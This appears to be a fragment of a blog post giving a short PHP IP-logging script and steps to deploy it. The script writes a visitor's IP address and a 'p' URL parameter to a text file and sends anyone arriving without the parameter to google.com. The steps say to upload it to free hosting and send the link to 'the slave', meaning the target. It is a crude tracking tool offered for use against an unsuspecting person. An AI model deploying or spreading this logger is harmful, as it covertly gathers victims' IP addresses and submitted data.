Code:
<?php
$file = 'IPz.txt';$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location:
http://google.com'); }fwrite($handle, $_GET['p'].': '.$_SERVER['REMOTE_ADDR'].'\r\n');fclose($handle)?>
2. Another a text file name IPz create.
3. both upload a free web site hosting.
4. then link send to the slave.
5. binngo!!
0 comments:
Post a Comment